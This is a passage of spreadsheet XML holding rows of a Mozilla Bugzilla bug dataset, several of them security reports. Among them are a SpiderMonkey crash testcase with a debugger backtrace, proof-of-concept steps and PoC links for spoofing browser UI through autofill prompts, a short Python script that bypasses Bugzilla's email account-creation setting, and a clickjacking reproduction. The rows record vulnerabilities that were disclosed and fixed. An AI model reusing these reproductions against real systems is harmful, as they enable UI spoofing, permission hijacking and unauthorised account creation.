      <c r="O3024" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3024" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q3024" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3024" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3024" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T3024" t="n">
        <v>1</v>
      </c>
      <c r="U3024" t="n">
        <v>0</v>
      </c>
      <c r="V3024" t="n">
        <v>14</v>
      </c>
      <c r="W3024" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision fb435df9797a (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-eager --ion-offthread-compile=off):
evaluate(`
  var p = Object.freeze([
    - undefined   
    + this
  ]);
  gc();
  evaluate(\`
    p[0]
  \`); 
`);
Backtrace:
received signal SIGSEGV, Segmentation fault.
0x000000000073db9e in js::jit::IonBuilder::constant (this=0x7ffff5f911c0, v=...) at js/src/jit/IonBuilder.cpp:13623
#0  0x000000000073db9e in js::jit::IonBuilder::constant (this=0x7ffff5f911c0, v=...) at js/src/jit/IonBuilder.cpp:13623
#1  0x000000000073dbc1 in js::jit::IonBuilder::pushConstant (this=0x7ffff5f911c0, v=...) at js/src/jit/IonBuilder.cpp:3237
#2  0x0000000000742bbb in js::jit::IonBuilder::getElemTryCallSiteObject (this=this@entry=0x7ffff5f911c0, emitted=emitted@entry=0x7fffffff9f0e, obj=obj@entry=0x7ffff5f91b88, index=index@entry=0x7ffff5f91ca8) at js/src/jit/IonBuilder.cpp:8291
#3  0x0000000000770690 in js::jit::IonBuilder::jsop_getelem (this=0x7ffff5f911c0) at js/src/jit/IonBuilder.cpp:7801
#4  0x000000000078cec5 in js::jit::IonBuilder::inspectOpcode (this=this@entry=0x7ffff5f911c0, op=op@entry=JSOP_GETELEM) at js/src/jit/IonBuilder.cpp:2174
#5  0x000000000078eb18 in js::jit::IonBuilder::visitBlock (this=this@entry=0x7ffff5f911c0, cfgblock=cfgblock@entry=0x7ffff494b3a8, mblock=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:1563
#6  0x000000000078f4ed in js::jit::IonBuilder::traverseBytecode (this=this@entry=0x7ffff5f911c0) at js/src/jit/IonBuilder.cpp:1480
#7  0x00000000007902b2 in js::jit::IonBuilder::build (this=this@entry=0x7ffff5f911c0) at js/src/jit/IonBuilder.cpp:863
#8  0x000000000079d402 in js::jit::IonCompile (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f17000, script=&lt;optimized out&gt;, baselineFrame=baselineFrame@entry=0x0, osrPc=osrPc@entry=0x0, recompile=&lt;optimized out&gt;, optimizationLevel=&lt;optimized out&gt;) at js/src/jit/Ion.cpp:2101
#9  0x000000000079de97 in js::jit::Compile (cx=cx@entry=0x7ffff5f17000, script=script@entry=..., osrFrame=osrFrame@entry=0x0, osrPc=osrPc@entry=0x0, forceRecompile=forceRecompile@entry=false) at js/src/jit/Ion.cpp:2384
#10 0x000000000079dfbc in js::jit::CanEnterIon (cx=cx@entry=0x7ffff5f17000, state=...) at js/src/jit/Ion.cpp:2468
#11 0x00000000007c8959 in js::jit::MaybeEnterJit (cx=cx@entry=0x7ffff5f17000, state=...) at js/src/jit/Jit.cpp:140
[...]
#18 0x00000000004706c3 in Evaluate (cx=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/shell/js.cpp:2014
#19 0x00000000005b4f01 in js::CallJSNative (cx=0x7ffff5f17000, native=0x46fb50 &lt;Evaluate(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/JSContext-inl.h:280
#20 0x00000000005a94bf in js::InternalCallOrConstruct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f17000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:467
#21 0x00000000005a989d in InternalCall (cx=0x7ffff5f17000, args=...) at js/src/vm/Interpreter.cpp:516
#22 0x00000000005a99ea in js::CallFromStack (cx=&lt;optimized out&gt;, args=...) at js/src/vm/Interpreter.cpp:522
#23 0x0000000000690a63 in js::jit::DoCallFallback (cx=&lt;optimized out&gt;, frame=0x7fffffffb508, stub_=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=0x7fffffffb4b8, res=...) at js/src/jit/BaselineIC.cpp:2382
#24 0x0000328edd29f71c in ?? ()
[...]
#46 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7ffff5f911c0	140737320128960
rcx	0x7ffff6c282ad	140737333330605
rdx	0x0	0
rsi	0x7ffff6ef7770	140737336276848
rdi	0x7ffff6ef6540	140737336272192
rbp	0x7fffffff9e80	140737488330368
rsp	0x7fffffff9e70	140737488330352
r8	0x7ffff6ef7770	140737336276848
r9	0x7ffff7fe4780	140737354024832
r10	0x58	88
r11	0x7ffff6b9e7a0	140737332766624
r12	0x7ffff4c990f0	140737300238576
r13	0x7ffff4c990c0	140737300238528
r14	0x7ffff5f91ca8	140737320131752
r15	0x7ffff5f911c0	140737320128960
rip	0x73db9e &lt;js::jit::IonBuilder::constant(JS::Value const&amp;)+222&gt;
=&gt; 0x73db9e &lt;js::jit::IonBuilder::constant(JS::Value const&amp;)+222&gt;:	movl   $0x0,0x0
   0x73dba9 &lt;js::jit::IonBuilder::constant(JS::Value const&amp;)+233&gt;:	ud2
Marking s-s because the test uses GC and the assertion also looks potentially s-s (type mismatch).</t>
        </is>
      </c>
      <c r="X3024" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3025">
      <c r="A3025" t="n">
        <v>1753339</v>
      </c>
      <c r="B3025" t="inlineStr">
        <is>
          <t>2022-02-02 17:32:26 -0800</t>
        </is>
      </c>
      <c r="C3025" t="inlineStr">
        <is>
          <t>Autofill prompt can render over browser UI and permission prompts, allows spoofing of browser UI</t>
        </is>
      </c>
      <c r="D3025" t="inlineStr">
        <is>
          <t>2023-10-17 20:49:25 -0700</t>
        </is>
      </c>
      <c r="E3025" t="n">
        <v>1</v>
      </c>
      <c r="F3025" t="n">
        <v>1</v>
      </c>
      <c r="G3025" t="n">
        <v>3</v>
      </c>
      <c r="H3025" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3025" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3025" t="inlineStr">
        <is>
          <t>Autocomplete</t>
        </is>
      </c>
      <c r="K3025" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3025" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3025" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3025" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3025" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3025" t="inlineStr">
        <is>
          <t>[fixed by bug 1826622][adv-main113+][adv-ESR102.11+]</t>
        </is>
      </c>
      <c r="Q3025" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3025" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3025" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T3025" t="n">
        <v>1</v>
      </c>
      <c r="U3025" t="n">
        <v>0</v>
      </c>
      <c r="V3025" t="n">
        <v>29</v>
      </c>
      <c r="W3025" t="inlineStr">
        <is>
          <t>Created attachment 9262023
autofill-over-browser-ui.mp4
VULNERABILITY DETAILS
Pages with carefully-positioned input fields can cause the browser to render autofill prompts over the browser UI. This can be used to spoof the address bar, cover/spoof permission prompts, cover window controls, or for other malicious purposes that involve covering the browser UI.
Only a single keypress (space or down arrow) is needed to open the autofill prompt and initiate the spoof. In the permission prompt PoCs, this single keypress is also used to obtain the user activation to open the permission prompt.
VERSION
Firefox Version: 96.0.3 Stable (Build ID 20220126154723), 98.0a1 Nightly (Build ID 20220127094620)
Operating System:	Windows_NT 10.0 19042
REPRODUCTION CASE
See attached video with recording of all PoCs.
The PoCs add arbitrary autofill entries using iframes containing forms (see autofill-setup-frame.html).
Note: In these basic PoCs, I assume the browser window is wide enough (1750px+ on my device) so the address bar and permission prompts are in an easily-predictable position. This is an implementation detail; a more advanced PoC can take into account narrower windows. You may need to adjust the position of the input fields on your device.
PoC for address bar spoof:
Prerequisite: Have at least one address in about:preferences#privacy -&gt; Forms and Autofill -&gt; Saved Addresses...
1. Navigate to https://alesandroortiz.com/security/firefox/autofill-ui-address-bar.html
2. Press space or down arrow once.
PoC for permission prompt to cover/spoof most of the prompt:
1. Navigate to https://alesandroortiz.com/security/firefox/autofill-ui-permission.html
2. (Same as first PoC)
PoC for permission prompt to cover "Block" button:
1. Navigate to https://alesandroortiz.com/security/firefox/autofill-ui-permission-button.html
2. (Same as first PoC)
PoC for address bar spoof + cover/spoof most of the permission prompt:
1. Navigate to https://alesandroortiz.com/security/firefox/autofill-ui-combo.html
2. (Same as first PoC)
For all PoCs:
Observed: Autofill prompt is rendered above browser UI, such as the address bar, permission prompts, and window controls.
Expected: Autofill prompt is rendered below browser UI, or is not rendered if there is no space to safely show.
CREDIT INFORMATION
Reporter credit: Alesandro Ortiz &lt;https://AlesandroOrtiz.com&gt;</t>
        </is>
      </c>
      <c r="X3025" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3026">
      <c r="A3026" t="n">
        <v>1407604</v>
      </c>
      <c r="B3026" t="inlineStr">
        <is>
          <t>2017-10-11 06:06:40 -0700</t>
        </is>
      </c>
      <c r="C3026" t="inlineStr">
        <is>
          <t>Fullscreen controls for videos are missing on baishi.baidu.com</t>
        </is>
      </c>
      <c r="D3026" t="inlineStr">
        <is>
          <t>2022-04-06 07:37:16 -0700</t>
        </is>
      </c>
      <c r="E3026" t="n">
        <v>1</v>
      </c>
      <c r="F3026" t="n">
        <v>1</v>
      </c>
      <c r="G3026" t="n">
        <v>2</v>
      </c>
      <c r="H3026" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3026" t="inlineStr">
        <is>
          <t>Web Compatibility</t>
        </is>
      </c>
      <c r="J3026" t="inlineStr">
        <is>
          <t>Site Reports</t>
        </is>
      </c>
      <c r="K3026" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="L3026" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3026" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3026" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3026" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3026" t="inlineStr">
        <is>
          <t>[sitewait]</t>
        </is>
      </c>
      <c r="Q3026" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3026" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3026" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3026" t="n">
        <v>1</v>
      </c>
      <c r="U3026" t="n">
        <v>0</v>
      </c>
      <c r="V3026" t="n">
        <v>14</v>
      </c>
      <c r="W3026" t="inlineStr">
        <is>
          <t>[Affected versions]:
- 58.0a1 (2017-10-10)
- DevEdition 57.0b7 build1 (20171009192146)
- 57.0b7 build1 (20171009192146)
- 56.0.1 build2 (20171002220106)
[Affected platforms]:
- Windows 10 x64
- macOS 10.13	
- Ubuntu 16.04 x64
[Steps to reproduce]:
1. Launch Firefox
2. Go to http://baishi.baidu.com/, choose a random video and play it (e.g. http://baishi.baidu.com/watch/2512640864030701220.html?&amp;recFrom=site&amp;list=4)
3. Click the fullscreen button 
[Expected result]:
- The fullscreen button is functional
- The video is properly played in normal and fullscreen modes
[Actual result]:
- The fullscreen button is inactive 
[Regression range]:
- This issue is reproducible all the way back to 29.0a1 (2014-01-02), so it isn't a recent regression
[Additional notes]:
- The issue is not triggered in Google Chrome</t>
        </is>
      </c>
      <c r="X3026" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3027">
      <c r="A3027" t="n">
        <v>695553</v>
      </c>
      <c r="B3027" t="inlineStr">
        <is>
          <t>2011-10-18 16:11:24 -0700</t>
        </is>
      </c>
      <c r="C3027" t="inlineStr">
        <is>
          <t>Non-ASCII characters generate error in search</t>
        </is>
      </c>
      <c r="D3027" t="inlineStr">
        <is>
          <t>2011-10-19 14:41:36 -0700</t>
        </is>
      </c>
      <c r="E3027" t="n">
        <v>1</v>
      </c>
      <c r="F3027" t="n">
        <v>1</v>
      </c>
      <c r="G3027" t="n">
        <v>5</v>
      </c>
      <c r="H3027" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3027" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3027" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K3027" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3027" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3027" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3027" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3027" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3027" t="inlineStr"/>
      <c r="Q3027" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3027" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3027" t="inlineStr">
        <is>
          <t>2011-10-18</t>
        </is>
      </c>
      <c r="T3027" t="n">
        <v>1</v>
      </c>
      <c r="U3027" t="n">
        <v>0</v>
      </c>
      <c r="V3027" t="n">
        <v>4</v>
      </c>
      <c r="W3027" t="inlineStr">
        <is>
          <t>Searching using ascii characters generates an error.</t>
        </is>
      </c>
      <c r="X3027" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3028">
      <c r="A3028" t="n">
        <v>395632</v>
      </c>
      <c r="B3028" t="inlineStr">
        <is>
          <t>2007-09-10 00:03:00 -0700</t>
        </is>
      </c>
      <c r="C3028" t="inlineStr">
        <is>
          <t>[SECURITY] XML-RPC WebService Bugzilla::User::offer_account_by_email does not check createemailregexp</t>
        </is>
      </c>
      <c r="D3028" t="inlineStr">
        <is>
          <t>2012-03-21 07:33:15 -0700</t>
        </is>
      </c>
      <c r="E3028" t="n">
        <v>1</v>
      </c>
      <c r="F3028" t="n">
        <v>1</v>
      </c>
      <c r="G3028" t="n">
        <v>4</v>
      </c>
      <c r="H3028" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3028" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3028" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K3028" t="inlineStr">
        <is>
          <t>3.0.1</t>
        </is>
      </c>
      <c r="L3028" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3028" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3028" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3028" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3028" t="inlineStr"/>
      <c r="Q3028" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3028" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3028" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T3028" t="n">
        <v>1</v>
      </c>
      <c r="U3028" t="n">
        <v>0</v>
      </c>
      <c r="V3028" t="n">
        <v>14</v>
      </c>
      <c r="W3028" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: 3.0.1
Despite leaving createemailregexp parameter blank (disable account creation by email) it is possible to use Bugzilla::User::offer_account_by_email. Any other kind of reular expression in createemailregexp is ignored, too.
It seems the value of createemailregexp is not checked.
Reproducible: Always
Steps to Reproduce:
1. set createemailregexp to whatever you like
2. fill appropriate values into the folowing python script
import xmlrpclib
server_proxy = xmlrpclib.ServerProxy( URL_TO_XMLRPCCGI ) 
server_proxy.User.offer_account_by_email( {'email':ANYMAILADDRESS} )
3. run the script
I already posted this issue on a newsgroup:
news://news.mozilla.org:119/TpqdnR2hvJwq1HzbnZ2dnUVZ_qKgnZ2d@mozilla.org</t>
        </is>
      </c>
      <c r="X3028" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3029">
      <c r="A3029" t="n">
        <v>773808</v>
      </c>
      <c r="B3029" t="inlineStr">
        <is>
          <t>2012-07-13 14:50:07 -0700</t>
        </is>
      </c>
      <c r="C3029" t="inlineStr">
        <is>
          <t>Cannot run ./configure to create Thunderbird source tarball</t>
        </is>
      </c>
      <c r="D3029" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:47 -0700</t>
        </is>
      </c>
      <c r="E3029" t="n">
        <v>1</v>
      </c>
      <c r="F3029" t="n">
        <v>1</v>
      </c>
      <c r="G3029" t="n">
        <v>5</v>
      </c>
      <c r="H3029" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3029" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3029" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K3029" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3029" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3029" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3029" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3029" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3029" t="inlineStr"/>
      <c r="Q3029" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3029" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3029" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3029" t="n">
        <v>1</v>
      </c>
      <c r="U3029" t="n">
        <v>0</v>
      </c>
      <c r="V3029" t="n">
        <v>7</v>
      </c>
      <c r="W3029" t="inlineStr">
        <is>
          <t>Created attachment 642066
configure stdio
During 14.0 build the source builder failed trying to configure. Attaching the build log, mozconfig and config.log</t>
        </is>
      </c>
      <c r="X3029" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3030">
      <c r="A3030" t="n">
        <v>1146416</v>
      </c>
      <c r="B3030" t="inlineStr">
        <is>
          <t>2015-03-23 09:16:15 -0700</t>
        </is>
      </c>
      <c r="C3030" t="inlineStr">
        <is>
          <t>NS_OpenAnonymousTemporaryFile() runs main thread code when run off the main thread</t>
        </is>
      </c>
      <c r="D3030" t="inlineStr">
        <is>
          <t>2017-03-14 11:21:22 -0700</t>
        </is>
      </c>
      <c r="E3030" t="n">
        <v>1</v>
      </c>
      <c r="F3030" t="n">
        <v>1</v>
      </c>
      <c r="G3030" t="n">
        <v>3</v>
      </c>
      <c r="H3030" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3030" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3030" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K3030" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3030" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3030" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3030" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3030" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3030" t="inlineStr">
        <is>
          <t>[adv-main39+]</t>
        </is>
      </c>
      <c r="Q3030" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3030" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3030" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T3030" t="n">
        <v>1</v>
      </c>
      <c r="U3030" t="n">
        <v>0</v>
      </c>
      <c r="V3030" t="n">
        <v>30</v>
      </c>
      <c r="W3030" t="inlineStr">
        <is>
          <t>lmandel found this crash report on crash stats:
https://crash-stats.mozilla.com/report/index/c3fccd5e-042e-4939-8751-b91dd2150323
MessageChannel::Send() is being called off the main thread, but somehow triggers a DelayedFireDOMPaintEvent::Run() that gets caught and then run by the script blocker.
Jed, is it expected that we can call NS_OpenAnonymousTemporaryFile() from off the main thread?  I can't tell which layer involved is not handling the off main thread case.</t>
        </is>
      </c>
      <c r="X3030" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3031">
      <c r="A3031" t="n">
        <v>1233784</v>
      </c>
      <c r="B3031" t="inlineStr">
        <is>
          <t>2015-12-18 10:33:16 -0800</t>
        </is>
      </c>
      <c r="C3031" t="inlineStr">
        <is>
          <t>firefox allows characters in cookie names that it shouldn't</t>
        </is>
      </c>
      <c r="D3031" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:59 -0700</t>
        </is>
      </c>
      <c r="E3031" t="n">
        <v>1</v>
      </c>
      <c r="F3031" t="n">
        <v>1</v>
      </c>
      <c r="G3031" t="n">
        <v>3</v>
      </c>
      <c r="H3031" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3031" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3031" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K3031" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L3031" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3031" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3031" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3031" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3031" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+]</t>
        </is>
      </c>
      <c r="Q3031" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3031" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3031" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T3031" t="n">
        <v>1</v>
      </c>
      <c r="U3031" t="n">
        <v>0</v>
      </c>
      <c r="V3031" t="n">
        <v>26</v>
      </c>
      <c r="W3031" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1191423 +++
So over in bug 1191423, we fixed problems with cookie values containing odd characters (vtab and such), but failed to fix the same issue with cookie names containing those odd characters. This bug is for that issue. I imagine this bug has the same potential security implications as 1191423, almost certainly no worse, and possibly not as bad (though I haven't done any serious analysis)</t>
        </is>
      </c>
      <c r="X3031" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3032">
      <c r="A3032" t="n">
        <v>513775</v>
      </c>
      <c r="B3032" t="inlineStr">
        <is>
          <t>2009-08-31 15:04:21 -0700</t>
        </is>
      </c>
      <c r="C3032" t="inlineStr">
        <is>
          <t>Cannot sign in with non-ascii passwords</t>
        </is>
      </c>
      <c r="D3032" t="inlineStr">
        <is>
          <t>2023-03-27 08:12:51 -0700</t>
        </is>
      </c>
      <c r="E3032" t="n">
        <v>1</v>
      </c>
      <c r="F3032" t="n">
        <v>1</v>
      </c>
      <c r="G3032" t="n">
        <v>6</v>
      </c>
      <c r="H3032" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3032" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J3032" t="inlineStr">
        <is>
          <t>Server: Sync</t>
        </is>
      </c>
      <c r="K3032" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3032" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3032" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3032" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3032" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3032" t="inlineStr"/>
      <c r="Q3032" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3032" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3032" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T3032" t="n">
        <v>1</v>
      </c>
      <c r="U3032" t="n">
        <v>0</v>
      </c>
      <c r="V3032" t="n">
        <v>6</v>
      </c>
      <c r="W3032" t="inlineStr">
        <is>
          <t>We added support for creating accounts with non-ascii passwords [1], and perhaps old accounts were able to created with non-ascii pre-0.5 server API. But trying to log in responds with "Authentication failed"
I tried curl DELETE with the user API, but got 401 Unauthorized, so it's maybe the password got set wrong?
[1] http://hg.mozilla.org/labs/weaveserver/rev/b8f38691cba2</t>
        </is>
      </c>
      <c r="X3032" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3033">
      <c r="A3033" t="n">
        <v>1863863</v>
      </c>
      <c r="B3033" t="inlineStr">
        <is>
          <t>2023-11-08 19:13:38 -0800</t>
        </is>
      </c>
      <c r="C3033" t="inlineStr">
        <is>
          <t>PopupNotifications Clickjacking: Closing popup window activates parent window with permission popup</t>
        </is>
      </c>
      <c r="D3033" t="inlineStr">
        <is>
          <t>2024-06-02 18:09:38 -0700</t>
        </is>
      </c>
      <c r="E3033" t="n">
        <v>1</v>
      </c>
      <c r="F3033" t="n">
        <v>1</v>
      </c>
      <c r="G3033" t="n">
        <v>3</v>
      </c>
      <c r="H3033" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3033" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3033" t="inlineStr">
        <is>
          <t>PopupNotifications and Notification Bars</t>
        </is>
      </c>
      <c r="K3033" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3033" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3033" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3033" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3033" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3033" t="inlineStr">
        <is>
          <t>[Fixed by Bug 1865914][reporter-external] [client-bounty-form] [verif?][adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q3033" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3033" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3033" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T3033" t="n">
        <v>1</v>
      </c>
      <c r="U3033" t="n">
        <v>0</v>
      </c>
      <c r="V3033" t="n">
        <v>17</v>
      </c>
      <c r="W3033" t="inlineStr">
        <is>
          <t>Created attachment 9362754
bandicam 2023-11-09 10-07-43-779.mp4
i found a vulnerability where user can fall for clickjacking to allow permission
I tested on Firefox dev version 120.0b3 (64-bit)
steps to reproduce:
1. open clickjack0.html then click open button
2. Click the "click 5 fastly" button fastly.</t>
        </is>
      </c>
      <c r="X3033" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3034">
      <c r="A3034" t="n">
        <v>1641487</v>
      </c>
      <c r="B3034" t="inlineStr">
        <is>
          <t>2020-05-28 01:53:09 -0700</t>
        </is>
      </c>
      <c r="C3034" t="inlineStr">
        <is>
          <t>Firefox Browser - Download Site Obscured from User</t>
        </is>
      </c>
      <c r="D3034" t="inlineStr">
        <is>
          <t>2024-05-30 10:14:55 -0700</t>
        </is>
      </c>
      <c r="E3034" t="n">
        <v>1</v>
      </c>
      <c r="F3034" t="n">
        <v>1</v>
      </c>
      <c r="G3034" t="n">
        <v>2</v>
      </c>
      <c r="H3034" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3034" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3034" t="inlineStr">
        <is>
          <t>Downloads Panel</t>
        </is>
      </c>
      <c r="K3034" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3034" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3034" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3034" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3034" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3034" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main81+][adv-esr78.3+]</t>
        </is>
      </c>
      <c r="Q3034" t="inlineStr">
